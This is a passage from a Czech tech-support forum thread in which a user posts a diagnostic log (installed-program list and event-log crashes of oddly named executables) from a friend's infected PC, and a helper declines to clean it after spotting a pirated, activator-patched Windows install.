"{90140000-002A-0405-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (Czech) 2010
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1029" = Microsoft .NET Framework 4.5.1 (čeština)
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{968720F5-3D81-7A28-C902-0876A57B1523}" = ATI AVIVO64 Codecs
"{BFAE8D5B-F918-486F-B74E-90762DF11C5C}" = Microsoft Security Client
"{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}" = Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319
"Bus-Simulator 2012_is1" = Bus-Simulator 2012 Demo
"CCleaner" = CCleaner
"LuxandBlink_is1" = Luxand Blink! v2.4
"Microsoft Security Client" = Microsoft Security Essentials
"Totalcmd64" = Total Commander 64-bit (Remove or Repair)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0733AA07-3A6C-47EA-8923-C295D1BE87FA}" = NS Folder Locker
"{0C702979-FB0E-9D78-DE61-6D90E384E55F}" = CCC Help Polish
"{10F87409-10AD-8CEE-F879-EA7D57615607}" = CCC Help Turkish
"{1730D13B-7517-4321-A88B-64627CF67CDC}_is1" = Logon Screen 2.20
"{1DF43EAC-B83D-BECB-F29B-76A7A353EC0C}" = CCC Help Norwegian
"{220C463A-2890-4C7F-B97C-C49FE175B849}" = OpenOffice 4.0.1
"{26604C7E-A313-4D12-867F-7C6E7820BE4C}" = JMicron Flash Media Controller Driver
"{26A24AE4-039D-4CA4-87B4-2F83217051FF}" = Java 7 Update 51
"{2F8BE445-D14C-40E2-AF62-E43539FD1500}" = YouTUBE (TM) movie downloader
"{3477DE8A-967D-507E-6520-FD540F49C116}" = CCC Help English
"{36AA02C7-2E56-9A70-0B1D-380E5954292C}" = CCC Help Czech
"{395F632D-7874-48B2-CE13-AAFE059B18B8}" = CCC Help Japanese
"{3C589A28-0DE4-5866-B9F1-C8E1BD6C3171}" = CCC Help Dutch
"{3C646034-7392-2259-3EAF-E93AD1409DF8}" = CCC Help Danish
"{3F5C371F-8EA2-4F25-9D3D-D0B4526E3AEA}" = NVIDIA PhysX
"{4019B8AB-DAFE-4CD0-E1E5-5ACD6E8E324F}" = CCC Help Hungarian
"{418CB0C6-B342-4D36-BACB-831BBEDFB68D}" = NIQES - testování
"{448AB2CB-C94A-47DE-80B8-9D7824DEFA57}" = Ulead DVD MovieFactory 4.0 SE
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}" = Skype™ 6.11
"{509B0A6E-BFAA-DF35-9A64-1EC29857E513}" = CCC Help Swedish
"{525072DA-059C-A596-ABBC-5D6877EBD5B5}" = Catalyst Control Center Localization All
"{5834909F-948F-4D5A-A355-7C9AAA7C41FE}" = Catalyst Control Center - Branding
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel(R) Management Engine Components
"{6768754B-9A1B-3991-2A8C-B17991AA659D}" = CCC Help Italian
"{6C772996-BFF3-3C8C-860B-B3D48FF05D65}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.51106
"{75AEE162-2DAF-C1F2-E1D8-A8F4ED04DA1A}" = CCC Help Greek
"{7D09972F-4B4D-8A48-7C39-C16BDC4551ED}" = CCC Help French
"{8545F9B8-12CD-01A2-4739-F4D0012C80FD}" = CCC Help Thai
"{8e70e4e1-06d7-470b-9f74-a51bef21088e}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106
"{90140000-0011-0000-0000-0000000FF1CE}" = Microsoft Office Professional Plus 2010
"{90140000-0015-0405-0000-0000000FF1CE}" = Microsoft Office Access MUI (Czech) 2010
"{90140000-0016-0405-0000-0000000FF1CE}" = Microsoft Office Excel MUI (Czech) 2010
"{90140000-0018-0405-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (Czech) 2010
"{90140000-0019-0405-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (Czech) 2010
"{90140000-001A-0405-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (Czech) 2010
"{90140000-001B-0405-0000-0000000FF1CE}" = Microsoft Office Word MUI (Czech) 2010
"{90140000-001F-0405-0000-0000000FF1CE}" = Microsoft Office Proof (Czech) 2010
"{90140000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2010
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-041B-0000-0000000FF1CE}" = Microsoft Office Proof (Slovak) 2010
"{90140000-002C-0405-0000-0000000FF1CE}" = Microsoft Office Proofing (Czech) 2010
"{90140000-0044-0405-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (Czech) 2010
"{90140000-006E-0405-0000-0000000FF1CE}" = Microsoft Office Shared MUI (Czech) 2010
"{90140000-00A1-0405-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (Czech) 2010
"{90140000-00BA-0405-0000-0000000FF1CE}" = Microsoft Office Groove MUI (Czech) 2010
"{92429C8B-86E2-176F-FB06-8F3A3C847DD3}" = CCC Help German
"{96DCEE2F-98EE-4F80-8C0F-7C04D1FB9D7F}" = JMicron Ethernet Adapter NDIS Driver
"{989B6566-DC9B-D79D-7C7A-688727165852}" = CCC Help Finnish
"{99C91FC5-DB5B-4AA0-BB70-5D89C5A4DF96}" = Software Version Updater
"{9ADBBA93-4625-4898-BB0D-BCE7EA9F8B4A}" = VirtualDJ 8
"{9BACB89D-98DA-E204-F904-6776079F1382}" = Catalyst Control Center InstallProxy
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A5AB6B23-7CB9-3181-DE14-C3F302099BF5}_is1" = windows 7 (aktivace legalizace crack nvod windows toolikt - HTML) version for Windows
"{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}" = ATK Package
"{AC76BA86-7AD7-1029-7B44-AB0000000001}" = Adobe Reader XI - Czech
"{BA3BE09C-22AD-4440-306F-6B5A7D7B5207}" = CCC Help Korean
"{BC9DBD2A-4E6A-BFCD-8476-58747501EA7A}" = CCC Help Chinese Standard
"{BEF1CD9C-F502-BC2C-9561-7E14DA937AD5}" = CCC Help Portuguese
"{C73B5B3B-F974-48CA-8B91-3E8A432AEA5B}" = Microsoft Works
"{CE681A67-9477-CBE6-EB9D-FE534875F98D}" = CostMin
"{CF474BB3-BD31-8C60-6938-6F5597A254EC}" = Catalyst Control Center
"{D4006E71-FF32-44FF-AD5A-B5EE4389B825}_is1" = FlatOut2
"{D49DBA4B-8ED1-E679-D000-BE301724FE6E}" = CCC Help Chinese Traditional
"{DC0BE1EC-8CD8-267E-0FC5-82605ED0045F}" = CCC Help Spanish
"{DC18AB34-9063-5642-7348-358A0C1ADF57}_is1" = Windows 7 - Lineage 2 Logon screen by WaniS version for Windows
"{E38C00D0-A68B-4318-A8A6-F7D4B5B1DF0E}" = Windows Media Encoder 9 Series
"{E768A65A-F731-DBCE-C6B0-61DCBD0DDCBF}_is1" = Minecraft 1.4 Free Full Download version for Windows
"{E824E81C-80A4-3DFF-B5F9-4842A9FF5F7F}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.51106
"{EB9C342B-A71C-F09C-0066-9AA565724980}" = CCC Help Russian
"{EE11CFFC-898C-4875-8A63-8B732A9AD43B}" = Aerosoft's - Aerosoft Launcher
"{EE27B7BE-353B-A414-0110-B617EE197EAA}_is1" = Adobe Photoshop CS6 full version CZ crack version for Windows
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"Adobe Flash Player ActiveX" = Adobe Flash Player 12 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 12 Plugin
"Bus Simulator 2008 Demo_is1" = Bus Simulator 2008 Demo
"Game Maker 8.0" = Game Maker 8.0
"GameSpy Arcade" = GameSpy Arcade
"IP Camera Viewer_is1" = IP Camera Viewer 1.0
"KLiteCodecPack_is1" = K-Lite Mega Codec Pack 9.9.0
"Kobra 11 V Utajení_is1" = Kobra 11 V Utajení
"Metro simulátor_is1" = Metro simulátor
"Mozilla Firefox 28.0 (x86 cs)" = Mozilla Firefox 28.0 (x86 cs)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"MsJavaVM" = Microsoft VM for Java
"Office14.PROPLUS" = Microsoft Office Professional Plus 2010
"RocketDock_is1" = RocketDock 1.3.5
"TeamViewer 9" = TeamViewer 9
"UltraUXThemePatcher" = UltraUXThemePatcher
"Unity" = Unity
"Wave Editor_is1" = Wave Editor 3.3.1.0
"webssearches uninstall" = webssearches uninstall
"Windows Media Encoder 9" = Windows Media Encoder 9 Series
"WindowsMangerProtect" = WindowsMangerProtect20.0.0.502
"WinRAR archiver" = WinRAR 4.20 (32-bit)
"XZip" = XZip
Nahoru
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Re: Kámošův pc - havěť

#9 Příspěvek od neumimvymysletjmeno »

========== HKEY_USERS Uninstall List ==========

[HKEY_USERS\S-1-5-21-3695167739-365663555-3534380330-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"iLivid" = iLivid
"SeznamInstall" = Seznam Software
"UnityWebPlayer" = Unity Web Player
"uTorrent" = µTorrent

========== Last 20 Event Log Errors ==========

[ Application Events ]
Error - 23.7.2014 3:29:31 | Computer Name = 2014-asus | Source = Application Error | ID = 1000
Description = Název chybující aplikace: dcgmnconuve.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Název chybujícího modulu: dcgmnconuve.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Kód výjimky: 0xc0000005 Posun chyby: 0x000483f3 ID chybujícího
procesu: 0xa18 Čas spuštění chybující aplikace: 0x01cfa647d76146ce Cesta k chybující
aplikaci: C:\Windows\SysWOW64\dcgmnconuve.exe Cesta k chybujícímu modulu: C:\Windows\SysWOW64\dcgmnconuve.exe
ID
zprávy: 15f29f61-123b-11e4-827c-1c4bd619be37

Error - 23.7.2014 3:29:31 | Computer Name = 2014-asus | Source = Application Error | ID = 1000
Description = Název chybující aplikace: dcgmncgmakai.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Název chybujícího modulu: dcgmncgmakai.exe, verze: 0.0.0.0,
časové razítko: 0x526b8bad Kód výjimky: 0xc0000005 Posun chyby: 0x000483f3 ID chybujícího
procesu: 0x13c4 Čas spuštění chybující aplikace: 0x01cfa647d7156fa2 Cesta k chybující
aplikaci: C:\Windows\SysWOW64\dcgmncgmakai.exe Cesta k chybujícímu modulu: C:\Windows\SysWOW64\dcgmncgmakai.exe
ID
zprávy: 15f90819-123b-11e4-827c-1c4bd619be37

Error - 23.7.2014 3:44:33 | Computer Name = 2014-asus | Source = Application Error | ID = 1000
Description = Název chybující aplikace: dcgmncoalkfk.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Název chybujícího modulu: dcgmncoalkfk.exe, verze: 0.0.0.0,
časové razítko: 0x526b8bad Kód výjimky: 0xc0000005 Posun chyby: 0x000483f3 ID chybujícího
procesu: 0x88c Čas spuštění chybující aplikace: 0x01cfa649f10692dd Cesta k chybující
aplikaci: C:\Windows\SysWOW64\dcgmncoalkfk.exe Cesta k chybujícímu modulu: C:\Windows\SysWOW64\dcgmncoalkfk.exe
ID
zprávy: 2f93a59f-123d-11e4-827c-1c4bd619be37

Error - 23.7.2014 3:44:33 | Computer Name = 2014-asus | Source = Application Error | ID = 1000
Description = Název chybující aplikace: mncxfeaxp.exe, verze: 0.0.0.0, časové razítko:
0x526b8bad Název chybujícího modulu: mncxfeaxp.exe, verze: 0.0.0.0, časové razítko:
0x526b8bad Kód výjimky: 0xc0000005 Posun chyby: 0x000483f3 ID chybujícího procesu:
0xd3c Čas spuštění chybující aplikace: 0x01cfa649f04f4e1e Cesta k chybující aplikaci:
C:\Windows\inf\mncxfeaxp\mncxfeaxp.exe Cesta k chybujícímu modulu: C:\Windows\inf\mncxfeaxp\mncxfeaxp.exe
ID
zprávy: 2f93577e-123d-11e4-827c-1c4bd619be37

Error - 23.7.2014 3:44:33 | Computer Name = 2014-asus | Source = Application Error | ID = 1000
Description = Název chybující aplikace: dcgmnconuve.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Název chybujícího modulu: dcgmnconuve.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Kód výjimky: 0xc0000005 Posun chyby: 0x000483f3 ID chybujícího
procesu: 0xd2c Čas spuštění chybující aplikace: 0x01cfa649f1002a25 Cesta k chybující
aplikaci: C:\Windows\SysWOW64\dcgmnconuve.exe Cesta k chybujícímu modulu: C:\Windows\SysWOW64\dcgmnconuve.exe
ID
zprávy: 2f93ccb0-123d-11e4-827c-1c4bd619be37

Error - 23.7.2014 3:44:33 | Computer Name = 2014-asus | Source = Application Error | ID = 1000
Description = Název chybující aplikace: dcgmncgmakai.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Název chybujícího modulu: dcgmncgmakai.exe, verze: 0.0.0.0,
časové razítko: 0x526b8bad Kód výjimky: 0xc0000005 Posun chyby: 0x000483f3 ID chybujícího
procesu: 0xa54 Čas spuštění chybující aplikace: 0x01cfa649f0eb6957 Cesta k chybující
aplikaci: C:\Windows\SysWOW64\dcgmncgmakai.exe Cesta k chybujícímu modulu: C:\Windows\SysWOW64\dcgmncgmakai.exe
ID
zprávy: 2f9441e2-123d-11e4-827c-1c4bd619be37

Error - 23.7.2014 3:48:21 | Computer Name = 2014-asus | Source = Application Error | ID = 1000
Description = Název chybující aplikace: mncxfeaxp.exe, verze: 0.0.0.0, časové razítko:
0x526b8bad Název chybujícího modulu: mncxfeaxp.exe, verze: 0.0.0.0, časové razítko:
0x526b8bad Kód výjimky: 0xc0000005 Posun chyby: 0x000483f3 ID chybujícího procesu:
0x178 Čas spuštění chybující aplikace: 0x01cfa64a7888c594 Cesta k chybující aplikaci:
C:\Windows\inf\mncxfeaxp\mncxfeaxp.exe Cesta k chybujícímu modulu: C:\Windows\inf\mncxfeaxp\mncxfeaxp.exe
ID
zprávy: b7733bf5-123d-11e4-827c-1c4bd619be37

Error - 23.7.2014 3:48:21 | Computer Name = 2014-asus | Source = Application Error | ID = 1000
Description = Název chybující aplikace: dcgmncgmakai.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Název chybujícího modulu: dcgmncgmakai.exe, verze: 0.0.0.0,
časové razítko: 0x526b8bad Kód výjimky: 0xc0000005 Posun chyby: 0x000483f3 ID chybujícího
procesu: 0x12dc Čas spuštění chybující aplikace: 0x01cfa64a790ee77b Cesta k chybující
aplikaci: C:\Windows\SysWOW64\dcgmncgmakai.exe Cesta k chybujícímu modulu: C:\Windows\SysWOW64\dcgmncgmakai.exe
ID
zprávy: b7736305-123d-11e4-827c-1c4bd619be37

Error - 23.7.2014 3:48:21 | Computer Name = 2014-asus | Source = Application Error | ID = 1000
Description = Název chybující aplikace: dcgmncoalkfk.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Název chybujícího modulu: dcgmncoalkfk.exe, verze: 0.0.0.0,
časové razítko: 0x526b8bad Kód výjimky: 0xc0000005 Posun chyby: 0x000483f3 ID chybujícího
procesu: 0x26c Čas spuštění chybující aplikace: 0x01cfa64a7932005f Cesta k chybující
aplikaci: C:\Windows\SysWOW64\dcgmncoalkfk.exe Cesta k chybujícímu modulu: C:\Windows\SysWOW64\dcgmncoalkfk.exe
ID
zprávy: b7864f0c-123d-11e4-827c-1c4bd619be37

Error - 23.7.2014 3:48:21 | Computer Name = 2014-asus | Source = Application Error | ID = 1000
Description = Název chybující aplikace: dcgmnconuve.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Název chybujícího modulu: dcgmnconuve.exe, verze: 0.0.0.0, časové
razítko: 0x526b8bad Kód výjimky: 0xc0000005 Posun chyby: 0x000483f3 ID chybujícího
procesu: 0xb0c Čas spuštění chybující aplikace: 0x01cfa64a79373092 Cesta k chybující
aplikaci: C:\Windows\SysWOW64\dcgmnconuve.exe Cesta k chybujícímu modulu: C:\Windows\SysWOW64\dcgmnconuve.exe
ID
zprávy: b786761c-123d-11e4-827c-1c4bd619be37

[ System Events ]
Error - 21.7.2014 9:21:04 | Computer Name = 2014-asus | Source = atapi | ID = 262155
Description = Ovladač zjistil chybu řadiče na \Device\Ide\IdePort0.

Error - 21.7.2014 9:21:08 | Computer Name = 2014-asus | Source = atapi | ID = 262155
Description = Ovladač zjistil chybu řadiče na \Device\Ide\IdePort0.

Error - 21.7.2014 9:21:34 | Computer Name = 2014-asus | Source = atapi | ID = 262155
Description = Ovladač zjistil chybu řadiče na \Device\Ide\IdePort0.

Error - 21.7.2014 9:21:44 | Computer Name = 2014-asus | Source = atapi | ID = 262155
Description = Ovladač zjistil chybu řadiče na \Device\Ide\IdePort0.

Error - 21.7.2014 9:22:19 | Computer Name = 2014-asus | Source = atapi | ID = 262155
Description = Ovladač zjistil chybu řadiče na \Device\Ide\IdePort0.

Error - 21.7.2014 9:22:24 | Computer Name = 2014-asus | Source = atapi | ID = 262155
Description = Ovladač zjistil chybu řadiče na \Device\Ide\IdePort0.

Error - 21.7.2014 9:25:33 | Computer Name = 2014-asus | Source = atapi | ID = 262155
Description = Ovladač zjistil chybu řadiče na \Device\Ide\IdePort0.

Error - 21.7.2014 9:26:28 | Computer Name = 2014-asus | Source = atapi | ID = 262155
Description = Ovladač zjistil chybu řadiče na \Device\Ide\IdePort0.

Error - 21.7.2014 9:26:50 | Computer Name = 2014-asus | Source = atapi | ID = 262155
Description = Ovladač zjistil chybu řadiče na \Device\Ide\IdePort0.

Error - 21.7.2014 11:17:48 | Computer Name = 2014-asus | Source = atapi | ID = 262155
Description = Ovladač zjistil chybu řadiče na \Device\Ide\IdePort0.


< End of report >
Nahoru
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Re: Kámošův pc - havěť

#10 Příspěvek od neumimvymysletjmeno »

To je všechno
Nahoru
Uživatelský avatar
vyosek
VIP
VIP
Příspěvky: 56373
Registrován: 07 lis 2006 15:24
Bydliště: Šalingrad - Brno

Re: Kámošův pc - havěť

#11 Příspěvek od vyosek »

:arrow: Log z RSIT ukazuje verzi W7 Home Premium, log z OTL ukazuje verzi Ultimate - ze by to nekdo menil, aby to nebylo napadne :?:

:arrow: At tak ci onak, system je nelegalni a ten tu resit nebudem...
"Kdo víno má a nepije,kdo hrozny má a nejí je, kdo ženu má a nelíbá, kdo zábavě se vyhýbá, na toho vemte bič a hůl, to není člověk, to je vůl."
Člen Obrázek od 1. února 2011.
Nahoru
Uživatelský avatar
vyosek
VIP
VIP
Příspěvky: 56373
Registrován: 07 lis 2006 15:24
Bydliště: Šalingrad - Brno

Re: Kámošův pc - havěť

#12 Příspěvek od vyosek »

Takze???
"Kdo víno má a nepije,kdo hrozny má a nejí je, kdo ženu má a nelíbá, kdo zábavě se vyhýbá, na toho vemte bič a hůl, to není člověk, to je vůl."
Člen Obrázek od 1. února 2011.
Nahoru
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Re: Kámošův pc - havěť

#13 Příspěvek od neumimvymysletjmeno »

Říkal že je legální, dostal ho od školy, přehřívá se a i seká
Nahoru
Uživatelský avatar
vyosek
VIP
VIP
Příspěvky: 56373
Registrován: 07 lis 2006 15:24
Bydliště: Šalingrad - Brno

Re: Kámošův pc - havěť

#14 Příspěvek od vyosek »

Skoly tyhle verze nerozdavaji, ty rozdavaji max Profi verze...

Z logu je zcela jasne videt pouziti aktivatoru...
"Kdo víno má a nepije,kdo hrozny má a nejí je, kdo ženu má a nelíbá, kdo zábavě se vyhýbá, na toho vemte bič a hůl, to není člověk, to je vůl."
Člen Obrázek od 1. února 2011.
Nahoru
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Re: Kámošův pc - havěť

#15 Příspěvek od neumimvymysletjmeno »

Jeho máma je učitelka...

On není talent v počítačích, myslel si že když není ve vlastnostech počítače obrázek "žádejte legální microsoft **(už si nepamatuju)
tak že to legální bude
Nahoru
Odpovědět

Zpět na „Řešení problémů, logy“